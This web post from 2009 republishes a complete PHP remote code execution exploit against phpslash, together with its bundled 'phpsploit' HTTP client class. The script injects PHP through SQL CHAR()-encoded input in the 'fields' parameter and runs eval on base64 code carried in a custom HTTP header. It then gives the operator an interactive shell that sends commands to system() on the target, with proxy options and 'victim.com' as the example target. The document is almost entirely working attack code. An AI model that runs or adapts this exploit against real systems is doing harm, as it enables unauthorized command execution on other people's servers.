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Posted on 02 February 2009

#!/usr/bin/php -q <?php # # phpslash <= Remote Code Execution Exploit # - - - - - - - - - - - - - - - - - - - - - - - - - # RCE with no special rights (guest). # No special PHP conditions required. # - - - - - - - - - - - - - - - - - - - - - - - - - # #0 It was a private sploit, but I decided to publish # it #1 You did the fag on that one bro, it will not happen # again =). #2 Don't try to use it on hzv, I helped them # to patch this one before I publish it =) # - - - - - - - - - - - - - - - - - - - - - - - - - # Exploitation steps: # 1 - include/class/tz_functions.inc tz_strftime() # 2 - include/class/tz_functions.inc tz_generic() # 3 - include/tz_env.class generic() # error_reporting( E_ALL ^ E_NOTICE ); // Main function function main() { // :) $web = new phpsploit(); $web->agent( 'Mozilla Firefox' ); // Hey ya :) head(); // Target $url = get_p( 'url', true ); // Proxy options $prh = get_p( 'proxhost' ); $pra = get_p( 'proxauth' ); // Use a proxy ? if( $prh ) { // host:ip $web->proxy( $prh ); // Authentication if( $pra ) $web->proxyauth( $pra ); } // Single quote bypass $byp = "1');"; // PHP code $php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));'; // Separator $s_sep = md5( rand( 0, 1000000000 ) . 'HEY_YA' ); $c_sep = "print('$s_sep');"; // Final PHP code $final = $byp . $c_sep . $php . $c_sep . 'exit();//'; // Welcome guess ! while( ($cmd = cmd_prompt()) !== false ) { // magic_quotes_gpc bypass $web->addheader( 'MypCode', base64_encode( 'system("' . add_slashes($cmd) . '");' ) ); // Go =] $web->get( $url . 'index.php?fields=' . to_char( $final ) . ',1' ); // Result $res = explode( $s_sep, $web->getcontent() ); // Erf if( !isset( $res[1] ) ) { print " Failed"; exit(1); } // Cool else { if( empty( $res[1] ) ) print " No output: system() disabled OR cmd failed OR cmd without output"; else print " " . $res[1]; } } return; } // No more bug with " and $ function add_slashes( $str ) { return str_replace( '$', '\$', addslashes( $str ) ); } // Command prompt function cmd_prompt() { print " shell>"; $cmd = trim( fgets( STDIN ) ); // Wanna stop =( ? if( in_array( strtolower( $cmd ) , array( 'exit', 'quit' ) ) ) return false; else return $cmd; } // MySQL CHAR() encoding function to_char( $data ) { $chars = 'CHAR('; $len = strlen( $data ); for( $i = 0; $i < $len; $i++ ) { $chars .= ord( $data[ $i ] ); if( $i != $len-1 ) $chars .= ','; } return $chars . ')'; } // CLI params function get_p( $p, $exit = false ) { foreach( $_SERVER['argv'] as $key => $value ) { if( $value === '-' . $p ) { if( isset( $_SERVER['argv'][ $key+1 ] ) && !empty( $_SERVER['argv'][ $key+1 ] ) ) { return $_SERVER['argv'][ $key+1 ]; } else { if( $exit ) usage(); return true; } } } if( $exit ) usage(); return false; } // Headers =) function head() { print " phpslash <= Remote Code Execution Exploit "; print "------------------------------------------------- "; print " About: "; print " by DarkFig < gmdarkfig (at) gmail (dot) com > "; print " http://acid-root.new.fr/ "; print " #acidroot@irc.worldnet.net "; return; } // Usage, can help.. function usage() { print " Usage: "; print " php spl.php -url <website> [options] "; print " Example: "; print " php spl.php -url http://victim.com/ "; print " Options: "; print " -proxhost <ip:port> if you wanna use a proxy "; print " -proxauth <usr:pwd> proxy with authentication "; exit(0); } // Run baby main(); /* * * Copyright (C) darkfig * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. * * TITLE: PhpSploit Class * REQUIREMENTS: PHP 4 / PHP 5 * VERSION: 2.1 * LICENSE: GNU General Public License * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt * FILENAME: phpsploitclass.php * * CONTACT: gmdarkfig@gmail.com (french / english) * GREETZ: Sparah, Ddx39 * * DESCRIPTION: * The phpsploit is a class implementing a web user agent. * You can add cookies, headers, use a proxy server with (or without) a * basic authentification. It supports the GET and the POST method. It can * also be used like a browser with the cookiejar() function (which allow * a server to add several cookies for the next requests) and the * allowredirection() function (which allow the script to follow all * redirections sent by the server). It can return the content (or the * headers) of the request. Others useful functions can be used for debugging. * A manual is actually in development but to know how to use it, you can * read the comments. * * CHANGELOG: * * [2008-08-29] (2.1) * * New: The showheader()/showcookie() functions can now return an array * * Bug #3 fixed: Problem concerning some servers for the main function * * [2007-06-10] (2.0) * * Code: Code optimization * * New: Compatible with PHP 4 by default * * [2007-01-24] (1.2) * * Bug #2 fixed: Problem concerning the getcookie() function ((|;)) * * New: multipart/form-data enctype is now supported * * [2006-12-31] (1.1) * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug) * * New: You can now call the getheader() / getcontent() function without parameters * * [2006-12-30] (1.0) * * First version * */ class phpsploit { var $proxyhost; var $proxyport; var $host; var $path; var $port; var $method; var $url; var $packet; var $proxyuser; var $proxypass; var $header; var $cookie; var $data; var $boundary; var $allowredirection; var $last_redirection; var $cookiejar; var $recv; var $cookie_str; var $header_str; var $server_content; var $server_header; /** * This function is called by the * get()/post()/formdata() functions. * You don't have to call it, this is * the main function. * * @access private * @return string $this->recv ServerResponse * */ function sock() { if(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = @fsockopen($this->proxyhost,$this->proxyport); else $socket = @fsockopen($this->host,$this->port); if(!$socket) die("Error: Host seems down"); if($this->method=='get') $this->packet = 'GET '.$this->url." HTTP/1.1 "; elseif($this->method=='post' or $this->method=='formdata') $this->packet = 'POST '.$this->url." HTTP/1.1 "; else die("Error: Invalid method"); if(!empty($this->proxyuser)) $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)." "; if(!empty($this->header)) $this->packet .= $this->showheader(); if(!empty($this->cookie)) $this->packet .= 'Cookie: '.$this->showcookie()." "; $this->packet .= 'Host: '.$this->host." "; $this->packet .= "Connection: Close "; if($this->method=='post') { $this->packet .= "Content-Type: application/x-www-form-urlencoded "; $this->packet .= 'Content-Length: '.strlen($this->data)." "; $this->packet .= $this->data." "; } elseif($this->method=='formdata') { $this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary." "; $this->packet .= 'Content-Length: '.strlen($this->data)." "; $this->packet .= $this->data; } $this->packet .= " "; $this->recv = ''; fputs($socket, $this->packet); while(!feof($socket)) $this->recv .= fgets($socket); fclose($socket); if($this->cookiejar) $this->getcookie(); if($this->allowredirection) return $this->getredirection(); else return $this->recv; } /** * This function allows you to add several * cookies in the request. * * @access public * @param string cookn CookieName * @param string cookv CookieValue * @example $this->addcookie('name','value') * */ function addcookie($cookn,$cookv) { if(!isset($this->cookie)) $this->cookie = array(); $this->cookie[$cookn] = $cookv; } /** * This function allows you to add several * headers in the request. * * @access public * @param string headern HeaderName * @param string headervalue Headervalue * @example $this->addheader('Client-IP', '') * */ function addheader($headern,$headervalue) { if(!isset($this->header)) $this->header = array(); $this->header[$headern] = $headervalue; } /** * This function allows you to use an * http proxy server. Several methods * are supported. * * @access public * @param string proxy ProxyHost * @param integer proxyp ProxyPort * @example $this->proxy('localhost',8118) * @example $this->proxy('localhost:8118') * */ function proxy($proxy,$proxyp='') { if(empty($proxyp)) { $proxarr = explode(':',$proxy); $this->proxyhost = $proxarr[0]; $this->proxyport = (int)$proxarr[1]; } else { $this->proxyhost = $proxy; $this->proxyport = (int)$proxyp; } if($this->proxyport > 65535) die("Error: Invalid port number"); } /** * This function allows you to use an * http proxy server which requires a * basic authentification. Several * methods are supported: * * @access public * @param string proxyauth ProxyUser * @param string proxypass ProxyPass * @example $this->proxyauth('user','pwd') * @example $this->proxyauth('user:pwd'); * */ function proxyauth($proxyauth,$proxypass='') { if(empty($proxypass)) { $posvirg = strpos($proxyauth,':'); $this->proxyuser = substr($proxyauth,0,$posvirg); $this->proxypass = substr($proxyauth,$posvirg+1); } else { $this->proxyuser = $proxyauth; $this->proxypass = $proxypass; } } /** * This function allows you to set * the 'User-Agent' header. * * @access public * @param string useragent Agent * @example $this->agent('Firefox') * */ function agent($useragent) { $this->addheader('User-Agent',$useragent); } /** * This function returns the headers * which will be in the next request. * * @access public * @return string $this->header_str Headers * @return array $this->head Headers * @example $this->showheader() * @example $this->showheader(1) * */ function showheader($array='') { $this->header_str = ''; if(!isset($this->header)) return; if(!empty($array)) return $this->header; foreach($this->header as $name => $value) $this->header_str .= $name.': '.$value." "; return $this->header_str; } /** * This function returns the cookies * which will be in the next request. * * @access public * @return string $this->cookie_str Cookies * @return array $this->cookie Cookies * @example $this->showcookie() * @example $this->showcookie(1) * */ function showcookie($array='') { if(!isset($this->cookie)) return; if(!empty($array)) return $this->cookie; $this->cookie_str = ''; foreach($this->cookie as $name => $value) $this->cookie_str .= $name.'='.$value.'; '; return $this->cookie_str; } /** * This function returns the last * formed http request. * * @access public * @return string $this->packet HttpPacket * @example $this->showlastrequest() * */ function showlastrequest() { if(!isset($this->packet)) return; else return $this->packet; } /** * This function sends the formed * http packet with the GET method. * * @access public * @param string url Url * @return string $this->sock() * @example $this->get('localhost/index.php?var=x') * @example $this->get('http://localhost:88/tst.php') * */ function get($url) { $this->target($url); $this->method = 'get'; return $this->sock(); } /** * This function sends the formed * http packet with the POST method. * * @access public * @param string url Url * @param string data PostData * @return string $this->sock() * @example $this->post('http://localhost/','helo=x') * */ function post($url,$data) { $this->target($url); $this->method = 'post'; $this->data = $data; return $this->sock(); } /** * This function sends the formed http * packet with the POST method using * the multipart/form-data enctype. * * @access public * @param array array FormDataArray * @return string $this->sock() * @example $formdata = array( * frmdt_url => 'http://localhost/upload.php', * frmdt_boundary => '123456', # Optional * 'var' => 'example', * 'file' => array( * frmdt_type => 'image/gif', # Optional * frmdt_transfert => 'binary' # Optional * frmdt_filename => 'hello.php, * frmdt_content => '<?php echo 1; ?>')); * $this->formdata($formdata); * */ function formdata($array) { $this->target($array[frmdt_url]); $this->method = 'formdata'; $this->data = ''; if(!isset($array[frmdt_boundary])) $this->boundary = 'phpsploit'; else $this->boundary = $array[frmdt_boundary]; foreach($array as $key => $value) { if(!preg_match('#^frmdt_(boundary|url)#',$key)) { $this->data .= str_repeat('-',29).$this->boundary." "; $this->data .= 'Content-Disposition: form-data; name="'.$key.'";'; if(!is_array($value)) { $this->data .= " ".$value." "; } else { $this->data .= ' filename="'.$array[$key][frmdt_filename].""; "; if(isset($array[$key][frmdt_type])) $this->data .= 'Content-Type: '.$array[$key][frmdt_type]." "; if(isset($array[$key][frmdt_transfert])) $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]." "; $this->data .= " ".$array[$key][frmdt_content]." "; } } } $this->data .= str_repeat('-',29).$this->boundary."-- "; return $this->sock(); } /** * This function returns the content * of the server response, without * the headers. * * @access public * @param string code ServerResponse * @return string $this->server_content * @example $this->getcontent() * @example $this->getcontent($this->get('http://localhost/')) * */ function getcontent($code='') { if(empty($code)) $code = $this->recv; $code = explode(" ",$code); $this->server_content = ''; for($i=1;$i<count($code);$i++) $this->server_content .= $code[$i]; return $this->server_content; } /** * This function returns the headers * of the server response, without * the content. * * @access public * @param string code ServerResponse * @return string $this->server_header * @example $this->getcontent() * @example $this->getcontent($this->post('http://localhost/','1=2')) * */ function getheader($code='') { if(empty($code)) $code = $this->recv; $code = explode(" ",$code); $this->server_header = $code[0]; return $this->server_header; } /** * This function is called by the * cookiejar() function. It adds the * value of the "Set-Cookie" header * in the "Cookie" header for the * next request. You don't have to * call it. * * @access private * @param string code ServerResponse * */ function getcookie() { foreach(explode(" ",$this->getheader()) as $header) { if(preg_match('/set-cookie/i',$header)) { $fequal = strpos($header,'='); $fvirgu = strpos($header,';'); // 12=strlen('set-cookie: ') $cname = substr($header,12,$fequal-12); $cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1)); $this->cookie[trim($cname)] = trim($cvalu); } } } /** * This function is called by the * get()/post() functions. You * don't have to call it. * * @access private * @param string urltarg Url * @example $this->target('http://localhost/') * */ function target($urltarg) { if(!ereg('^http://',$urltarg)) $urltarg = 'http://'.$urltarg; $urlarr = parse_url($urltarg); if(!isset($urlarr['path']) || empty($urlarr['path'])) die("Error: No path precised"); $this->url = $urlarr['path']; if(isset($urlarr['query'])) $this->url .= '?'.$urlarr['query']; $this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80; $this->host = $urlarr['host']; if($this->port != '80') $this->host .= ':'.$this->port; $this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1); if($this->port > 65535) die("Error: Invalid port number"); } /** * If you call this function, * the script will extract all * 'Set-Cookie' headers values * and it will automatically add * them into the 'Cookie' header * for all next requests. * * @access public * @param integer code 1(enabled) 0(disabled) * @example $this->cookiejar(0) * @example $this->cookiejar(1) * */ function cookiejar($code) { if($code=='0') $this->cookiejar=FALSE; elseif($code=='1') $this->cookiejar=TRUE; } /** * If you call this function, * the script will follow all * redirections sent by the server. * * @access public * @param integer code 1(enabled) 0(disabled) * @example $this->allowredirection(0) * @example $this->allowredirection(1) * */ function allowredirection($code) { if($code=='0') $this->allowredirection=FALSE; elseif($code=='1') $this->allowredirection=TRUE; } /** * This function is called if * allowredirection() is enabled. * You don't have to call it. * * @access private * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection) * @return string $this->get($this->last_redirection) * @return string $this->recv; * */ function getredirection() { if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr)) { $this->last_redirection = trim($codearr[2]); if(!ereg('://',$this->last_redirection)) return $this->get('http://'.$this->host.$this->path.$this->last_redirection); else return $this->get($this->last_redirection); } else return $this->recv; } /** * This function allows you * to reset some parameters. * * @access public * @param string func Param * @example $this->reset('header') * @example $this->reset('cookie') * @example $this->reset() * */ function reset($func='') { switch($func) { case 'header': $this->header = array(); break; case 'cookie': $this->cookie = array(); break; default: $this->cookiejar = ''; $this->header = array(); $this->cookie = array(); $this->allowredirection = ''; break; } } } ?>



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